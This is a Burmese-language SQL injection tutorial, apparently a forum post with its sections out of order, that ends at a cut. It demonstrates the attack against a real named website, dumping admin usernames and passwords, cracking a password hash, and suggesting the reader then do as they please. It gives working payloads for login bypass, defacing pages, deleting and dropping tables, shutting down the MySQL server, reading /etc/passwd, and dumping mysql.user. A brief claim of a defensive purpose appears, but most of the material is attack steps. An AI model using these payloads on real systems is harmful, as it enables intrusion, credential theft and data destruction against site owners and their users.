ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...
ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္
http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..
ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး
7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္..
ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..
ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...
---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သုိ႔မဟုတ္
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..
www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
--MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..
ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain & Able
www.oxid.it
hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။
ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...
Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။
---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...
ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5
(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..
* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..
---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက
hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com
---အသုံး၀င္တဲ႔ MySQL commands အခ်ိဳ႕ပါ..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
SQL Injection မွာ အသုံးၿပဳတဲ႔ အေၿခခံေတြပဲ ရွိပါေသးတယ္... ဒီထက္မ်ားတဲ႔ functions ေတြအမ်ားၾကီးရွိသလုိ ဒီထက္ပုိၿပီးနက္နဲတဲ႔ အသုံးၿပဳပုံေတြရွိပါတယ္... ေလ့လာတဲ႔သူေတြအေနနဲ႔ မိမိတုိ႔ကုိယ္တုိင္ SQL commands ေတြကုိ အရင္ဆုံး ကုိယ္တုိင္စမ္းစစ္ၿပီး မိမိတုိ႔ရဲ႕ SQL commands အသုံးၿပဳမႈအရည္အခ်င္းကုိ ၿမင့္တင္သင့္ပါတယ္။
ခု မသိသူေတြအတြက္ ထပ္မံတင္ေပးတာပါ
--- မိတ္ဆက္---
Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။
---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...
Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။
--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။
ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...
---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။
ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။
username:a or 1=1--
password:blank
SQL query မွာေတာ့
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။
SELECT USER from database WHERE username='a' or 1=1
1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။
---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5
id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..
www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...
အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။
www.site.com/article.php?id=5 union select 1--
In ASP ==>>
